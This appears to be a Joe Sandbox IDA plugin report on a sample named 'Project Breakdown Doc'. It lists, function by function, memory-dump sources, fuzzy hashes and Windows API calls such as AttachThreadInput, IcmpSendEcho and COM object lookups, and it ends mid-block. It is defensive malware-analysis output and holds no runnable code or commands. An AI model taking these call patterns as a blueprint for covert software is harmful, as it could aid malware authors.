                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                  • String ID: static
                                                  • API String ID: 2559357485-2160076837
                                                  • Opcode ID: 2d3ea5dc646cc436d58d0fd1c64a3cb576be740a4ebfd80119063cbdc839270b
                                                  • Instruction ID: 172be2d705fae1c7b98778e3d2910ea642ee2fe86db62f328debabb8d22521dc
                                                  • Opcode Fuzzy Hash: 2d3ea5dc646cc436d58d0fd1c64a3cb576be740a4ebfd80119063cbdc839270b
                                                  • Instruction Fuzzy Hash: C8316D31105219ABDF129FA4DC09FDE3B6AFF09724F110329FA65A61E0C731D862DBA4
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C6707B
                                                    • Part of subcall function 00C68D68: __getptd_noexit.LIBCMT ref: 00C68D68
                                                  • __gmtime64_s.LIBCMT ref: 00C67114
                                                  • __gmtime64_s.LIBCMT ref: 00C6714A
                                                  • __gmtime64_s.LIBCMT ref: 00C67167
                                                  • __allrem.LIBCMT ref: 00C671BD
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C671D9
                                                  • __allrem.LIBCMT ref: 00C671F0
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C6720E
                                                  • __allrem.LIBCMT ref: 00C67225
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C67243
                                                  • __invoke_watson.LIBCMT ref: 00C672B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                  • String ID:
                                                  • API String ID: 384356119-0
                                                  • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                  • Instruction ID: 4158b80275f823ed9b0a436b08ebc1273844220a299b29a3c1ed0f8473d1b480
                                                  • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                  • Instruction Fuzzy Hash: 6D71FA71A04717EBD7349F79CCD1B5AB3A8AF15328F14872AF528D7281E770DA409790
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CA2A31
                                                  • GetMenuItemInfoW.USER32(00D06890,000000FF,00000000,00000030), ref: 00CA2A92
                                                  • SetMenuItemInfoW.USER32(00D06890,00000004,00000000,00000030), ref: 00CA2AC8
                                                  • Sleep.KERNEL32(000001F4), ref: 00CA2ADA
                                                  • GetMenuItemCount.USER32(?), ref: 00CA2B1E
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00CA2B3A
                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00CA2B64
                                                  • GetMenuItemID.USER32(?,?), ref: 00CA2BA9
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CA2BEF
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA2C03
                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA2C24
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                  • String ID:
                                                  • API String ID: 4176008265-0
                                                  • Opcode ID: 7541bd743d89b0eccad39e1a38c557e28fa64ee6f3588d2b7ead3ae0831b3383
                                                  • Instruction ID: 99a5f9945afd2b0f1f22a1ac5700d0d3969df26c7488cb2834cd78ed274310b5
                                                  • Opcode Fuzzy Hash: 7541bd743d89b0eccad39e1a38c557e28fa64ee6f3588d2b7ead3ae0831b3383
                                                  • Instruction Fuzzy Hash: 7761A47090026AAFDB21CF68DD88EBEBBB9FB0631CF140459E85297251D731AE45DB30
                                                  APIs
                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CC7214
                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CC7217
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00CC723B
                                                  • _memset.LIBCMT ref: 00CC724C
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CC725E
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CC72D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$LongWindow_memset
                                                  • String ID:
                                                  • API String ID: 830647256-0
                                                  • Opcode ID: dfd3888f3415b4ec4493896978a255276d91877d12edc6968b4375c36e4d6600
                                                  • Instruction ID: c6fad2d6d315f153324469e69028172bbb5d6d0c94101e7fccd32ad5511cae8d
                                                  • Opcode Fuzzy Hash: dfd3888f3415b4ec4493896978a255276d91877d12edc6968b4375c36e4d6600
                                                  • Instruction Fuzzy Hash: 86614775A00248AFDB20DFA4CC81FEE77F8EB09710F144259FA14A72A1D774AA55DFA0
                                                  APIs
                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C97135
                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00C9718E
                                                  • VariantInit.OLEAUT32(?), ref: 00C971A0
                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C971C0
                                                  • VariantCopy.OLEAUT32(?,?), ref: 00C97213
                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C97227
                                                  • VariantClear.OLEAUT32(?), ref: 00C9723C
                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00C97249
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C97252
                                                  • VariantClear.OLEAUT32(?), ref: 00C97264
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C9726F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                  • String ID:
                                                  • API String ID: 2706829360-0
                                                  • Opcode ID: 036c4fe4cf1ce1fe7a19a54bd22496f1aa8ff402e8a2d2dfe2aa83cf1ea12b4e
                                                  • Instruction ID: a17047a7a6f6d4f3b08c7f2090eabda4de48f6ba1e1cba108fe73e6de2ef21c3
                                                  • Opcode Fuzzy Hash: 036c4fe4cf1ce1fe7a19a54bd22496f1aa8ff402e8a2d2dfe2aa83cf1ea12b4e
                                                  • Instruction Fuzzy Hash: D8415075910219EFCF04DF64D848EAEBBB9FF48354F008169F915A7261CB30AA46DB90
                                                  APIs
                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00CB5AA6
                                                  • inet_addr.WSOCK32(?,?,?), ref: 00CB5AEB
                                                  • gethostbyname.WSOCK32(?), ref: 00CB5AF7
                                                  • IcmpCreateFile.IPHLPAPI ref: 00CB5B05
                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CB5B75
                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CB5B8B
                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CB5C00
                                                  • WSACleanup.WSOCK32 ref: 00CB5C06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                  • String ID: Ping
                                                  • API String ID: 1028309954-2246546115
                                                  • Opcode ID: a3b1d114c1f0a500cfaede993d89579442ad2880f6672c72991a2fef4f3f54e0
                                                  • Instruction ID: e3a751844e16b5afee8624ceceae9946ba783d19ec28d2c74d91e4ee89766660
                                                  • Opcode Fuzzy Hash: a3b1d114c1f0a500cfaede993d89579442ad2880f6672c72991a2fef4f3f54e0
                                                  • Instruction Fuzzy Hash: 8C5180316047009FDB11AF25CC89B6EBBE5EF48710F148969F566DB2E1DB70E900DB42
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00CAB73B
                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CAB7B1
                                                  • GetLastError.KERNEL32 ref: 00CAB7BB
                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00CAB828
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                  • API String ID: 4194297153-14809454
                                                  • Opcode ID: 4eb403e5e958930c8a4c7e4053fd1547ea4744d2c1cff3f184909973f9ef27e3
                                                  • Instruction ID: db3538a240092bf33ad239e7144753571955fe98d09df45793883f9a4e833967
                                                  • Opcode Fuzzy Hash: 4eb403e5e958930c8a4c7e4053fd1547ea4744d2c1cff3f184909973f9ef27e3
                                                  • Instruction Fuzzy Hash: 45318035A0020A9FDB10EF68C885ABEBBB4FF86748F144029E516D72D2DBB19E42D751
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C9B0E7
                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C994F6
                                                  • GetDlgCtrlID.USER32 ref: 00C99501
                                                  • GetParent.USER32 ref: 00C9951D
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C99520
                                                  • GetDlgCtrlID.USER32(?), ref: 00C99529
                                                  • GetParent.USER32(?), ref: 00C99545
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C99548
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 0c05eb176a7d36703f03ae85b9ae47e8c27cfd43a537a3fb3da0ffcdce6f74ac
                                                  • Instruction ID: 570bfcc0926f8681d7e41fa7923ccbd03986ec0bb3da99dd1e01d0371c2fd381
                                                  • Opcode Fuzzy Hash: 0c05eb176a7d36703f03ae85b9ae47e8c27cfd43a537a3fb3da0ffcdce6f74ac
                                                  • Instruction Fuzzy Hash: 8F21C470900108BBDF05ABA4CC89EFEBB75FF49300F104229F561972E2DB759919EB20
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C9B0E7
                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C995DF
                                                  • GetDlgCtrlID.USER32 ref: 00C995EA
                                                  • GetParent.USER32 ref: 00C99606
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C99609
                                                  • GetDlgCtrlID.USER32(?), ref: 00C99612
                                                  • GetParent.USER32(?), ref: 00C9962E
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C99631
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 0cbb61cd665a226320da83d7aa712f22511b8a6184af8442f6a31e5be4a5ca14
                                                  • Instruction ID: 9efda9658859bebab936274cffd42cc36b413a0ce460e15143eb41e953234c54
                                                  • Opcode Fuzzy Hash: 0cbb61cd665a226320da83d7aa712f22511b8a6184af8442f6a31e5be4a5ca14
                                                  • Instruction Fuzzy Hash: F6219574900208BBDF05ABA4CC89FFEBB79EF58300F104159F961972A1DB759919EB20
                                                  APIs
                                                  • GetParent.USER32 ref: 00C99651
                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00C99666
                                                  • _wcscmp.LIBCMT ref: 00C99678
                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C996F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                  • API String ID: 1704125052-3381328864
                                                  • Opcode ID: 674d1484cf309abe60924af434e25f690e851d05b80aff6967abb8a90367b312
                                                  • Instruction ID: 63774e60ad097623c4c93d1e268b83d85b59260dbdc600f9237d73ee452daea2
                                                  • Opcode Fuzzy Hash: 674d1484cf309abe60924af434e25f690e851d05b80aff6967abb8a90367b312
                                                  • Instruction Fuzzy Hash: 8E110A7624834BBAFF512625DC4FEAA779CCF05360B20013EFA10A50E1FE716A515A59
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00CB8BEC
                                                  • CoInitialize.OLE32(00000000), ref: 00CB8C19
                                                  • CoUninitialize.OLE32 ref: 00CB8C23
                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00CB8D23
                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CB8E50
                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00CD2C0C), ref: 00CB8E84
                                                  • CoGetObject.OLE32(?,00000000,00CD2C0C,?), ref: 00CB8EA7
                                                  • SetErrorMode.KERNEL32(00000000), ref: 00CB8EBA
                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CB8F3A
                                                  • VariantClear.OLEAUT32(?), ref: 00CB8F4A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                  • String ID:
                                                  • API String ID: 2395222682-0
                                                  • Opcode ID: 50390ea46799ea3160d494c2f3f46df04bff9289b65efe241f6c931a5ae08bad
                                                  • Instruction ID: 709c56463cf4d01457e617a762fc4d03422f7d9c9d1a6fdeac123f5b81e6ebae
                                                  • Opcode Fuzzy Hash: 50390ea46799ea3160d494c2f3f46df04bff9289b65efe241f6c931a5ae08bad
                                                  • Instruction Fuzzy Hash: 88C135B1208305AFD700DF64C884A6BB7E9FF89748F00496DF58A9B251DB31ED0ACB52
                                                  APIs
                                                  • __swprintf.LIBCMT ref: 00CA419D
                                                  • __swprintf.LIBCMT ref: 00CA41AA
                                                    • Part of subcall function 00C638D8: __woutput_l.LIBCMT ref: 00C63931
                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00CA41D4
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00CA41E0
                                                  • LockResource.KERNEL32(00000000), ref: 00CA41ED
                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00CA420D
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00CA421F
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00CA422E
                                                  • LockResource.KERNEL32(?), ref: 00CA423A
                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00CA429B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                  • String ID:
                                                  • API String ID: 1433390588-0
                                                  • Opcode ID: c95a8c5d5cc47e1f40d60432befbf6164c6f6f23f9a19d2d15674ce3a60e0a5c
                                                  • Instruction ID: 9eb516c05f1d35866f8a8db18130cd8d419fc51f0f88c4ca781fd54d50255667
                                                  • Opcode Fuzzy Hash: c95a8c5d5cc47e1f40d60432befbf6164c6f6f23f9a19d2d15674ce3a60e0a5c
                                                  • Instruction Fuzzy Hash: 2C31B0B1A0120BABDB199F60DC48FBF7BADEF49305F004629F915D6150D7B0DA529BB0
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00CA1700
                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA1714
                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00CA171B
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA172A
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CA173C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA1755
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA1767
                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA17AC
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA17C1
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CA0778,?,00000001), ref: 00CA17CC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                  • String ID:
                                                  • API String ID: 2156557900-0
                                                  • Opcode ID: f7e184b8db2bcc859334b11365ca015cb13e7a55c611a4b6557410a114046d0d
                                                  • Instruction ID: 600f0ebfffe58b26324f5346f910f7d858a12bce514c3f113bf865eccfb58714
                                                  • Opcode Fuzzy Hash: f7e184b8db2bcc859334b11365ca015cb13e7a55c611a4b6557410a114046d0d
                                                  • Instruction Fuzzy Hash: FE31BF75A00306BBEB119F14DC84FAD3BAAEF16755F194028FD18CA3A0D770AE408BA0
                                                  APIs
                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C4FC06
                                                  • OleUninitialize.OLE32(?,00000000), ref: 00C4FCA5
                                                  • UnregisterHotKey.USER32(?), ref: 00C4FDFC
                                                  • DestroyWindow.USER32(?), ref: 00C84A00
                                                  • FreeLibrary.KERNEL32(?), ref: 00C84A65
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C84A92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                  • String ID: close all
                                                  • API String ID: 469580280-3243417748
                                                  • Opcode ID: e370d03197843ce0b62440f3eed320c3a104383e419a0bb01fa7fcb17f9ea0cc
                                                  • Instruction ID: 9c61cb368ea9b327571afddc63ade993cebe200d2a8e03eaf852cee101d3b4fd
                                                  • Opcode Fuzzy Hash: e370d03197843ce0b62440f3eed320c3a104383e419a0bb01fa7fcb17f9ea0cc
                                                  • Instruction Fuzzy Hash: 7AA14A34701212CFCB29EF14C495B69F7A5BF04704F1542ADE81AAB262DB30AE17EF58
                                                  APIs
                                                  • EnumChildWindows.USER32(?,00C9AA64), ref: 00C9A9A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
